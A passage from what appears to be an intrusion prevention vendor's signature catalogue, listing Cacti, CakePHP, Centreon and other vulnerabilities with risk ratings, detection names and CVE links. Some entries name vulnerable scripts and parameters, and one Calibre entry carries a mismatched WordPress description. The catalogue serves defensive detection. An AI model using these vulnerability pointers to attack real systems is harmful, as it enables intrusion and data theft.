First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Improper input validation of user supplied input when calling the sql_save function causes an SQL injection vulnerability in Cacti SQL. A successful exploit allows an attacker to execute arbitrary SQL on the target database.
Situation: HTTP_CRL-Cacti-Group-Cacti-SQL_Save-SQL-Injection
References:
CVE-2023-39357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39357
Back to top

Cacti-Group-poller_Host_Duplicate-SQL-Injection

About this vulnerability: A vulnerability in Cacti Group
Risk: High
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Cacti. The vulnerability is due to insufficient validation of user data in the poller_host_duplicate function. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the target server's database.
Situation: HTTP_CRL-Cacti-Group-Cacti-poller_Host_Duplicate-SQL-Injection
References:
CVE-2023-49085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49085
Back to top

Cacti-Host_Templates-Template-SQL-Injection-CVE-2024-54146

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: Moderate
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Improper validation of user input used in the template function causes an SQL injection vulnerability in Cacti. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Cacti-Host_Templates-Template-SQL-Injection-CVE-2024-54146
References:
CVE-2024-54146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54146
Back to top

Cacti-Links.php-Console-Section-Name-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Cacti
Risk: Moderate
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Improper validation of the consolesection and consolenewsection parameters causes a cross-site scripting vulnerability in Cacti. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Cacti-Links.php-Console-Section-Name-Stored-Cross-Site-Scripting
References:
CVE-2024-43365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43365
Back to top

Cacti-Links.php-Fileurl-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Cacti
Risk: Moderate
First detected in: sgpkg-ips-1804-5242
Last changed: sgpkg-ips-1804-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Improper validation of the fileurl parameter when adding/editing external links causes a cross-site scripting vulnerability in Cacti. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Cacti-Links.php-Fileurl-Stored-Cross-Site-Scripting
References:
CVE-2024-43362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43362
Back to top

Cacti-Links.php-Title-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Cacti
Risk: Moderate
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Improper validation of the title parameters when adding/editing the external links causes a cross-site scripting vulnerability in Cacti. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Cacti-Links.php-Title-Stored-Cross-Site-Scripting
References:
CVE-2024-43364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43364
Back to top

Cacti-poller_Standard-Error-Log-Path-Arbitrary-File-Read-CVE-2024-45598

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: Moderate
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Improper validation of the path_stderrlog parameter when updating the "Poller Standard Error Log Path" setting causes a vulnerability in Cacti. A successful exploitation allows an attacker to read arbitrary files on the target system.
Situation: HTTP_CRL-Cacti-poller_Standard-Error-Log-Path-Arbitrary-File-Read-CVE-2024-45598
References:
CVE-2024-45598
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45598
Back to top

Cacti-Spikekill-Cross-Site-Scripting

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: Moderate
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Improper validation of HTTP request parameters causes a cross-site scripting vulnerability in Cacti. Successful exploitation allows an attacker to run arbitrary scripts in the user's browser.
Situation: HTTP_CRL-Cacti-Spikekill-Cross-Site-Scripting
References:
CVE-2017-12927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12927
Back to top

Cain-And-Abel-RDP-Buffer-Overflow

About this vulnerability: A Cain and Abel RDP Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-801-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: Cain and Abel
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Cain and Abel, version 4.9.24, which allows remote attackers to execute arbitrary code via a long string in an RDP file.
Situation: File-Text_Cain-And-Abel-RDP-Buffer-Overflow
References:
CVE-2008-5405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5405
BID-32543
http://www.securityfocus.com/bid/32543
OSVDB-50342
http://www.osvdb.org/50342
Back to top

CakePHP-PHP-Injection-Unserialize-Attack

About this vulnerability: A PHP Injection Unserialize Attack in CakePHP 1.3.x-1.3.5 and 1.28
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1720-5242
Platform: Any Operating System
Software: CakePHP
Type: PHP Injection
Description: CakePHP versions 1.3.x-1.3.5 and 1.28 allows remote attackers to execute arbitrary code by allowing modification of data values, in the Cake cache, that is processed by the unserialize function.
Situation: File-Text_CakePHP-PHP-Injection-Unserialize-Attack
References:
CVE-2010-4335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4335
BID-44852
http://www.securityfocus.com/bid/44852
OSVDB-69352
http://www.osvdb.org/69352
Back to top

Calendar-Pl-Remote-Command

About this vulnerability: Calendar.pl remote command execution vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1761-5242
Platform: Generic
Software: Calendar.pl
Type: Code Injection
Description: The calendar.pl script has a vulnerability that could allow an attacker to run arbitrary commands. This is because calendar.pl is not protected against executing programs by passing '|' to the open() call.
References:
CVE-2000-0432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0432
BID-1215
http://www.securityfocus.com/bid/1215
Back to top

Calibre-Python-Code-Injection-CVE-2024-6782

About this vulnerability: A vulnerability in WordPress Project Husky Products Filter Plugin
Risk: Moderate
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Platform: Generic
Software: Calibre
Type: Input Validation
Description: Improper validation of request contents causes a code injection vulnerability in Calibre. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Calibre-Python-Code-Injection-CVE-2024-6782
References:
CVE-2024-6782
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6782
Back to top

Cambium-ePMP-1000-Ping-Command-Injection

About this vulnerability: A Cambium ePMP 1000 Ping Command Injection Vulnerability
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1383-5242
Platform: Generic
Software: Cambium ePMP
Type: Input Validation
Description: A vulnerability in Cambium ePMP 1000 devices, versions 2.5 and before, which allows remote attackers to run arbitrary OS commands via the ping_ip and traceroute_ip functions, due to insufficient input validation.
Situation: HTTP_CRL-Cambium-ePMP-1000-Ping-Command-Injection
Back to top

Campcodes-Thesis-Archiving-System-SQL-Injection-CVE-2023-2149

About this vulnerability: An attempt to exploit a vulnerability in Campcodes Online Thesis Archiving System detected
Risk: High
First detected in: sgpkg-ips-1592-5242
Last changed: sgpkg-ips-1592-5242
Platform: Generic
Software: Campcodes Online Thesis Archiving System
Type: Input Validation
Description: This vulnerability was found in Campcodes Online Thesis Archiving System 1.0. It affects the file "/admin/user/manage_user.php", in which the manipulation of the argument "id" leads to SQL injection.
Situation: HTTP_CRL-Campcodes-Thesis-Archiving-System-SQL-Injection-CVE-2023-2149
References:
CVE-2023-2149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2149
Back to top

Campo-Downloader-Malware-Infection-Traffic

About this vulnerability: Campo Downloader malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1329-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Campo Downloader malware infection traffic was detected.
Situation: HTTP_CSU-Campo-Downloader-Malware-Infection-Traffic
HTTP_SHS-Campo-Downloader-Malware-Infection-Traffic
Back to top

Camtron-CMNC-200-Buffer-Overflow-CVE-2010-4230

About this vulnerability: A vulnerability in Camtron CMNC-200
Risk: High
First detected in: sgpkg-ips-1788-5242
Last changed: sgpkg-ips-1788-5242
Platform: Generic
Software: Camtron CMNC-200
Type: Buffer Overflow
Description: A stack buffer overflow in the Camtron CMNC-200 and TecVoz CMNC-200 IP camera firmware version 1.102A-008 allows unauthenticated remote code execution via a crafted HTML document.
Situation: File-Text_Camtron-CMNC-200-Buffer-Overflow-CVE-2010-4230
References:
CVE-2010-4230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4230
Back to top

Canon-Printer-Denial-Of-Service

About this vulnerability: A Canon Printer Denial Of Service vulnerability.
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Canon
Type: Input Validation
Description: A vulnerability in the Canon MG3100, MG5300, MG6100, MP495, MX340, MX870, MX890, MX920, and MX922 printers that allows remote attackers to cause a denial of service condition via a crafted LAN_TXT24 parameter to the English/pages_MacUS/cgi_lan.cgi followed by a direct request to English/pages_MacUS/lan_set_content.html.
Situation: HTTP_CRL_Canon-Printer-Denial-Of-Service
References:
CVE-2013-4615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4615
BID-60598
http://www.securityfocus.com/bid/60598
Back to top

Canonical-Ksmbd-Tools-Ksmbd.Mountd-SMB_Read_Sid-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Canonical ksmdb-tools
Risk: Moderate
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1651-5242
Platform: Generic
Software: Canonical ksmdb-tools
Type: Buffer Overflow
Description: Insufficient validation of LSARPC requests submitted to ksmbd.mountd daemon causes a heap buffer overflow vulnerability in Canonical ksmbd-tools. A successful exploit allows an attacker to cause a denial of service condition or execute code on the target system.
Situation: MSRPC-TCP_CPS-Canonical-Ksmbd-Tools-Ksmbd.Mountd-SMB_Read_Sid-Heap-Buffer-Overflow
Back to top

Carberp-Botnet

About this vulnerability: Carberp Botnet
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Carberp
Type: Backdoor
Description: Carberp is a trojan horse program. Hosts compromised by this trojan form a remote controllable botnet. The controller of the botnet can run arbitrary code on the compromised hosts as well as spy everything the users of the compromised hosts do.
Situation: HTTP_CS-Carberp-Botnet-Traffic-Detected
HTTP_CSU-Carberp-Botnet-Traffic-Detected
HTTP_CSH-Carberp-Botnet-Traffic-Detected
HTTP_CRL-Carberp-Botnet
HTTP_CRL-Carberp-Botnet-Traffic-Detected
Back to top

Carberp-Web-Panel-Remote-Code-Execution

About this vulnerability: Carberp Web Panel Remote Code Execution
Risk: High
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Carberp
Type: Buffer Overflow
Description: An attempt at remote code execution for the Carberp botnet C2 Web Panel.
Situation: HTTP_CRL-Carberp-Web-Panel-Remote-Code-Execution
Back to top

Carel-PlantVisor-Directory-Traversal

About this vulnerability: A vulnerability in Carel PlantVisor
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Carel PlantVisor
Type: Malfunction
Description: There are multiple directory traversal vulnerabilities in Carel PlantVisor which allow an unauthorized remote attacker to write or delete arbitrary files and to execute arbitrary commands.
Situation: HTTP_CRL-Carel-PlantVisor-Directory-Traversal
Back to top

Carel-PlantVisor-Pro-Hardcoded-Credentials-Vulnerability

About this vulnerability: A vulnerability in Carel PlanVisor Pro
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Carel PlantVisor Pro
Type: Malfunction
Description: Carel PlantVisor Pro uses hardcoded credentials.
Situation: HTTP_CSU-Carel-PlantVisor-Pro-Hardcoded-Credentials-Vulnerability
Back to top

Carel-PlantVisor-Pro-Local-File-Inclusion-Vulnerability

About this vulnerability: A vulnerability in Carel PlanVisor Pro
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Carel PlantVisor Pro
Type: Malfunction
Description: There is a local file inclusion vulnerability in Carel PlantVisor Pro which allows an attacker to download arbitrary files.
Situation: HTTP_CSU-Carel-PlantVisor-Pro-Local-File-Inclusion-Vulnerability
Back to top

Carlo-Gavazzi-PowerSoft-Directory-Traversal

About this vulnerability: A vulnerability in Carlo Gavazzi PowerSoft
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Carlo Gavazzi PowerSoft
Type: Malfunction
Description: There is a directory traversal vulnerability in Carlo Gavazzi PowerSoft. Successful exploitation by a remote attacker could result in the disclosure of sensitive information.
Situation: HTTP_CSU-Carlo-Gavazzi-PowerSoft-Directory-Traversal
Back to top

Castle-Rock-Computing-SNMPc-Cross-Site-Scripting-CVE-2016-5642

About this vulnerability: An attempt to exploit a vulnerability in Castle Rock Computing SNMPc detected
Risk: High
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: Castle Rock Computing SNMPc Network Manager
Type: Input Validation
Description: Castle Rock Computing SNMPc before 2015-12-17 has a cross-site scripting (XSS) vulnerability via SNMP Trap messages.
Situation: SNMP-UDP_Cross-Site-Scripting-Via-SNMP-Trap
References:
CVE-2015-6027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6027
Back to top

Cayin-CMS-NTP-Server-RCE

About this vulnerability: A vulnerability in Cayin CMS.
Risk: High
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Platform: Linux
Software: Cayin CMS
Type: Input Validation
Description: A vulnerability in Cayin CMS, versions 11.0 and before, which allows remote attackers to execute arbitrary shell commands via the ntpIp parameter to system_service.cgi, due to insufficient input validation.
Situation: HTTP_CRL-Cayin-CMS-NTP-Server-RCE
References:
CVE-2020-7357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7357
Back to top

Cayin-xPost-wayfinder_seqid-SQLi

About this vulnerability: A vulnerability in Cayin xPost
Risk: High
First detected in: sgpkg-ips-1289-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cayin xPost
Type: Input Validation
Description: There exists a vulnerability in Cayin xPost, versions 2.5 and before, which allows remote attackers to peform an SQL injection in the wayfinder_seqid parameter, due to the lack of user input validation.
Situation: HTTP_CRL-Cayin-xPost-wayfinder_seqid-SQLi
References:
CVE-2020-7356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7356
Back to top

CCSO-Mercury-Mail-Transport-System-Long-Command-BOF

About this vulnerability: Mercury Mail Transport System buffer overflow via long command lines
Risk: High
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mercury Mail Transport System
Type: Buffer Overflow
Description: Certain versions of Mercury Mail Transport System suffer from a buffer overflow vulnerability. Commands are delimited by linefeeds, and each command is copied into a buffer of 528 bytes without any length checks. A long command line will overflow the buffer, allowing remote attackers to execute arbitrary code with the privileges of the service process. The vulnerable service is started with Administrator privileges by default.
Situation: CCSO_Mercury-Mail-Transport-System-Long-Command-BOF
References:
CVE-2005-4411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4411
BID-16396
http://www.securityfocus.com/bid/16396
OSVDB-22103
http://www.osvdb.org/22103
Back to top

CCTV-DVR-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in CCTV/DVR devices detected
Risk: High
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: It is possible to exploit a remote code execution vulnerability in the /language component of multiple CCTV/DVR devices as it does not correctly sanitize the value of the given parameter.
Situation: HTTP_CRL-Unix-IFS-Code-Execution
Back to top

CentOS-Web-Panel-7-Remote-Code-Execution-CVE-2022-44877

About this vulnerability: A vulnerability in CentOS Web Panel
Risk: High
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Platform: Generic
Software: CentOS Web Panel
Type: Input Validation
Description: A remote code execution vulnerability has been reported in the CentOS Web Panel 7 versions before v0.9.8.1147.
Situation: HTTP_CRL-CentOS-Web-Panel-7-Remote-Code-Execution-CVE-2022-44877
References:
CVE-2022-44877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44877
Back to top

CentOS-Web-Panel-Command-Injection-CVE-2018-18322

About this vulnerability: A vulnerability in CentOS Web Panel
Risk: High
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Platform: Generic
Software: CentOS Web Panel
Type: Input Validation
Description: There exists a command injection vulnerability in CentOS Web Panel 0.9.8.480. A successful exploitation could allow remote attackers to execute arbitrary commands with shell metacharacters.
Situation: HTTP_CRL-CentOS-Web-Panel-Command-Injection-CVE-2018-18322
References:
CVE-2018-18322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18322
Back to top

Centreon-centreonAuth-Command-Injection

About this vulnerability: A vulnerability in Centreon
Risk: High
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: There exists a command injection vulnerability in the centreonAuth.class.php authentication component of Centreon. This can allow a remote, unauthenticated attacker to execute arbitrary system commands on the affected system.
Situation: HTTP_CRL-Centreon-centreonAuth-Command-Injection
Back to top

Centreon-CSV_hostgrouplogs-SQL-Injection

About this vulnerability: A vulnerability in Centreon
Risk: Moderate
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Improper input validation in csv_HostGroupLogs.php causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Centreon-CSV_hostgrouplogs-SQL-Injection
References:
CVE-2021-37556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37556
Back to top

Centreon-formMibs-Command-Injection

About this vulnerability: A vulnerability in Centreon
Risk: High
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: There exists a vulnerability in Centreon, versions 19.04.3 and before, which allows remote attackers to execute limited arbitrary code due to the lack of input validation of the formMibs.php form.
Situation: HTTP_CS-Centreon-formMibs-Command-Injection
References:
CVE-2019-15298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15298
Back to top

Centreon-Generateimage-Index-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon
Risk: Moderate
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Insufficient input validation in the generateImage.php component of Centreon causes an SQL injection vulnerability which can be exploited to gain the ability to execute arbitrarty SQL on the target system.
Situation: HTTP_CRL-Centreon-Generateimage-Index-SQL-Injection
References:
CVE-2021-37557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37557
Back to top

Centreon-Graph-Split-Chartid-SQL-Injection

About this vulnerability: A vulnerability in Centreon
Risk: Moderate
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Insufficient input validation in graph-split.php causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to execute arbitrary SQL on the target database.
Situation: HTTP_CRL-Centreon-Graph-Split-Chartid-SQL-Injection
Back to top

Centreon-Hostgroupdependency-dep_Id-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon
Risk: Moderate
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Improper input validation in hostGroupDependency.php causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to exeucte arbitrary SQL on the target system.
Situation: HTTP_CRL-Centreon-Hostgroupdependency-dep_Id-SQL-Injection
Back to top

Centreon-Knowledgebase-Proxy-Proceduresproxy-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon
Risk: Moderate
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Insufficient input validation in the ProceduresProxy.class.php causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to run arbitrary SQL on the target database.
Situation: HTTP_CRL-Centreon-Knowledgebase-Proxy-Proceduresproxy-SQL-Injection
References:
CVE-2021-37558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37558
Back to top

Centreon-Metaservice-Meta_Id-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon
Risk: Moderate
First detected in: sgpkg-ips-1384-5242
Last changed: sgpkg-ips-1384-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: An SQL Injection vulnerability has been reported in the Centreon Web Application. The vulnerability is due to incorrect input validation in metaService.php. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in arbitrary SQL command execution against the database on the target server.
Situation: HTTP_CRL-Centreon-Metaservice-Meta_Id-SQL-Injection
Back to top

Centreon-Nagios-Path-Command-Injection

About this vulnerability: A vulnerability in Centreon
Risk: High
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Platform: Windows; Linux; Unix
Software: Centreon
Type: Input Validation
Description: There exists a vulnerability in Centreon, versions 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29, which allows remote attackers to execute arbitrary code via the nagios_bin parameter to main.get.php, due to insufficient user input validation.
Situation: HTTP_CRL-Centreon-Nagios-Path-Command-Injection
References:
CVE-2019-13024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13024
Back to top

Centreon-poller-Remote-Command-Execution

About this vulnerability: A vulnerability in Centreon
Risk: High
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1383-5242
Platform: Linux
Software: Centreon
Type: Input Validation
Description: There exists a vulnerability in Centreon, version 19.10.5, which allows remote attackers to execute arbitrary code through poller management.
Situation: HTTP_CRL-Centreon-poller-Remote-Command-Execution
References:
CVE-2019-19699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19699
Back to top

Centreon-RRDdatabase_Status_Path-Command-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon
Risk: Moderate
First detected in: sgpkg-ips-1259-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: A command injection vulnerability has been reported in the Centreon Web Application. The vulnerability is due to improper validation of the RRDdatabase_status_path parameter in an HTTP request. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in arbitrary command execution in the context of the server process.
Situation: HTTP_CRL-Centreon-RRDdatabase_Status_Path-Command-Injection
References:
CVE-2020-13252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13252
Back to top

Centreon-Serverconnectionconfigurationservice.php-Command-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon
Risk: Moderate
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Improper handling of the server_ip parameter in a HTTP request causes a command injection vulnerability in the Centreon Web Application. A successful exploit allows an attacker to execute arbitrary commands on the target with the privileges of the vulnerable service.
Situation: File-Text_Centreon-Serverconnectionconfigurationservice.php-Command-Injection
References:
CVE-2020-9463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9463
Back to top

Centreon-SQL-And-Command-Injection

About this vulnerability: A Centreon SQL And Command Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: A vulnerability in Centron 2.5.1 and before, and Centron Enterprise Server 2.2, which allows remote attackers to execute SQL injections, or arbitrary commands, via the index_id parameter to views/graphs/common/makeXML_ListMetrics.php, the sid parameter to views/graphs/GetXmlTree.php, the session_id parameter to views/graphs/graphStatus/displayServiceStatus.php, the mdftr_id parameter to configuration/configObject/traps/GetXMLTrapsForVendor.php, and the index parameter to common/javascript/commandGetArgs/cmdGetExample.php. The older versions use a URL of views/graphs/statusGraphs/ instead of views/graphs/graphStatus/. This covers CVE-2014-3828 and CVE-2014-3829.
Situation: HTTP_CRL_Centreon-SQL-And-Command-Injection
References:
CVE-2014-3828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3828
BID-70648
http://www.securityfocus.com/bid/70648
Back to top

Centreon-Web-Centreongraph-Initcurvelist-SQL-Injection

About this vulnerability: A vulnerability in Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1780-5242
Last changed: sgpkg-ips-1780-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Improper validation of user input used in the initCurveList function causes an SQL injection vulnerability in Centreon Web. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Centreon-Web-Centreongraph-Initcurvelist-SQL-Injection
References:
CVE-2024-5725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5725
Back to top

Centreon-Web-Formcontactgroup-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Insufficient input validation in formContactGroup.php causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Centreon-Web-Formcontactgroup-SQL-Injection
References:
CVE-2022-42427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42427
Back to top

Centreon-Web-Insertgraphtemplate-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Insufficient input validation when creating graph templates causes an SQL injection vulnerability in Centreon Web. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Centreon-Web-Insertgraphtemplate-SQL-Injection
References:
CVE-2024-23119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23119
Back to top

Centreon-Web-Managevmetric-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Improper validation of user input when creating or modifying virtual metrics causes an SQL injection vulnerability in Centreon. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Centreon-Web-Managevmetric-SQL-Injection
References:
CVE-2024-55573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55573
Back to top

Centreon-Web-poller-Broker-Disablcentreonbrokerindb-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: A SQL Injection vulnerability has been reported in the Centreon Web Poller Broker module. The vulnerability is due to insufficient input validation when disabling broker configurations. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in arbitrary SQL command execution against the database on the target server.
Situation: HTTP_CRL-Centreon-Web-poller-Broker-Disablcentreonbrokerindb-SQL-Injection
References:
CVE-2022-42424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42424
Back to top

Centreon-Web-poller-Broker-Enablecentreonbrokerindb-SQL-Injection

About this vulnerability: A vulnerability in Centreon
Risk: Moderate
First detected in: sgpkg-ips-1535-5242
Last changed: sgpkg-ips-1550-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Insufficient input validation when enabling broker configurations causes an SQL injection vulnerability in Centreon Web. A successful exploit allows an attacker to execute arbitrary SQL on the target database.
Situation: HTTP_CRL-Centreon-Web-poller-Broker-Enablecentreonbrokerindb-SQL-Injection
References:
CVE-2022-42425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42425
Back to top

Centreon-Web-poller-Broker-Insertconfig-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Insufficient input validation causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to execute arbitrary SQL on the target database.
Situation: HTTP_CRL-Centreon-Web-poller-Broker-Insertconfig-SQL-Injection
References:
CVE-2022-42429
